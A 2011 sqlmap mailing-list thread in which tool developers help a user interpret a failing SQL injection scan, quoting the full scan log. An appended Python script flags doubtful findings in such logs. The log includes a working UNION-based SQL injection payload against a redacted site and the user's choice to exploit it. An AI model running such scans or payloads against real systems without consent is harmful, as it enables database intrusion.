hi all. little tutorial for all of you. spot the problematic parts:
A)
[14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minutes and rerun without flag T in --technique option (e.g. --flush-session --technique=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)

B)
....
[14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
....

C)
do you want to exploit this SQL injection? [Y/n] Y
[14:40:13] [INFO] testing MySQL
[14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form

now. do you see the problem yourself? that warning message says it all. have you tried lowering the --time-sec value? have you tried running with --technique=BEUS?

thing is that in INNER JOIN cases injecting TIME BASED payloads can do lots of "[CRITICAL]" messages. hence that nice warning message :)

kr

On Tue, Jul 12, 2011 at 10:49 PM, Bernardo Damele A. G. <bernardo.dam...@gmail.com> wrote:
> Hi Joahnna,
>
> Try to provide --union-char and --union-cols after you have verified
> the UNION query SQL injection manually in your browser.
> Rerun with --flush-session and -t traffic.log and inspect the log file
> afterwards to see if the SQL payload is indeed part of the HTTP
> response you expect it.
> If the fingerprint keeps failing, provide sqlmap with --dbms "mysql 5".
>
> Bernardo
>
>
> On 12 July 2011 14:32, Joahnna Marie Damiao <damijo_1...@yahoo.com> wrote:
>>
>> Hi,
>> Below is the sqlmap command.
>> Next time I ran it, it already says that the
>> parameter filename is not injectable. However, I always get an info that the
>> target URL is UNION injectable but the number of columns change every
>> session. I also used the --technique=U --dbms=mysql --flush-session
>> --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable
>> message but nothing is vulnerable. What seems to be the problem here?
>> Anybody can help me?
>>
>> C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --batch --beep
>>
>> sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool
>> http://www.sqlmap.org
>>
>> [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 14:39:37
>>
>> [14:39:37] [INFO] setting file for logging HTTP traffic
>> [14:39:37] [INFO] testing connection to the target url
>> [14:39:38] [INFO] searching for forms
>> [#1] form: [INFO]
>> GET xxxxxxxxx
>> do you want to test this form? [Y/n/q]
>> > Y
>> Edit GET data [default: xxxxxxxx
>> do you want to fill blank fields with random values? [Y/n] Y
>> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as session file
>> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' as results file
>> [14:39:38] [INFO] testing if the url is stable, wait a few seconds
>> [14:39:39] [INFO] url is stable
>> [14:39:39] [INFO] testing if GET parameter 'productid' is dynamic
>> [14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic
>> [14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might not be injectable
>> [14:39:39] [INFO] testing sql injection on GET parameter 'productid'
>> [14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>> [14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>> [14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>> [14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [14:39:41] [INFO] testing 'Oracle AND time-based blind'
>> [14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [14:39:42] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. you can try to explicitly set it using the --dbms option
>> [14:39:44] [WARNING] GET parameter 'productid' is not injectable
>> [14:39:44] [INFO] testing if GET parameter 'name' is dynamic
>> [14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic
>> [14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be injectable
>> [14:39:44] [INFO] testing sql injection on GET parameter 'name'
>> [14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>> [14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>> [14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>> [14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [14:39:46] [INFO] testing 'Oracle AND time-based blind'
>> [14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:39:51] [WARNING] GET parameter 'name' is not injectable
>> [14:39:51] [INFO] testing if GET parameter 'filename' is dynamic
>> [14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic
>> [14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might not be injectable
>> [14:39:52] [INFO] testing sql injection on GET parameter 'filename'
>> [14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>> [14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>> [14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>> [14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>> [14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minutes and rerun without flag T in --technique option (e.g. --flush-session --technique=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)
>> [14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [14:39:56] [INFO] testing 'Oracle AND time-based blind'
>> [14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:09] [CRITICAL] unable to connect to the target url or proxy
>> [14:40:09] [INFO] target url appears to be UNION injectable with 10 columns
>> [14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:13] [CRITICAL] unable to connect to the target url or proxy
>> [14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
>> GET parameter 'filename' is vulnerable. Do you want to keep testing the others? [y/N] N
>> sqlmap identified the following injection points with a total of 414 HTTP(s) requests:
>> ---
>> Place: GET
>> Parameter: filename
>> Type: UNION query
>> Title: Generic UNION query (NULL) - 1 to 10 columns
>> Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsDiekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&creationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isactive=on&comment=uPni
>> ---
>>
>> do you want to exploit this SQL injection? [Y/n] Y
>> [14:40:13] [INFO] testing MySQL
>> [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form
>> [14:40:16] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv'
>>
>> [*] shutting down at 14:40:16
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable
>

--
Miroslav Stampar (@stamparm)

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
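
The point of the reply above, as an added example (not part of the original thread and not sqlmap code): a small log triage that marks a reported injection point as suspect when it was logged amid connection failures or after the time-based recovery warning. The function name `triage`, the 30-second window and the failure threshold are assumptions chosen for illustration.

```python
import re
from datetime import datetime, timedelta

# Sample input: lines taken from the log quoted in the thread, unwrapped and shortened.
SAMPLE_LOG = """\
[14:39:44] [WARNING] GET parameter 'productid' is not injectable
[14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload.
[14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:09] [CRITICAL] unable to connect to the target url or proxy
[14:40:13] [CRITICAL] unable to connect to the target url or proxy
[14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
"""

LINE = re.compile(r"^\[(\d\d:\d\d:\d\d)\] \[(\w+)\] (.*)$")
FINDING = re.compile(r"GET parameter '([^']+)' is '(.+)' injectable")


def triage(log_text, window_seconds=30, max_failures=2):
    """Return one verdict per reported injection point.

    A finding is 'suspect' when more than max_failures connection errors, or
    the time-based recovery warning, were logged in the window before it.
    Assumes the log does not cross midnight (timestamps carry no date).
    """
    events, verdicts = [], []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # prompts, banners and wrapped fragments carry no timestamp
        ts = datetime.strptime(m.group(1), "%H:%M:%S")
        level, msg = m.group(2), m.group(3)
        events.append((ts, level, msg))
        hit = FINDING.search(msg)
        if not hit:
            continue
        start = ts - timedelta(seconds=window_seconds)
        recent = [e for e in events if start <= e[0] <= ts]
        failures = sum(1 for _, lvl, text in recent
                       if lvl == "CRITICAL" and "unable to connect" in text)
        recovering = any("hasn't recovered yet" in text for _, _, text in recent)
        verdicts.append({
            "parameter": hit.group(1),
            "technique": hit.group(2),
            "connection_failures": failures,
            "recovery_warning": recovering,
            "suspect": failures > max_failures or recovering,
        })
    return verdicts
```
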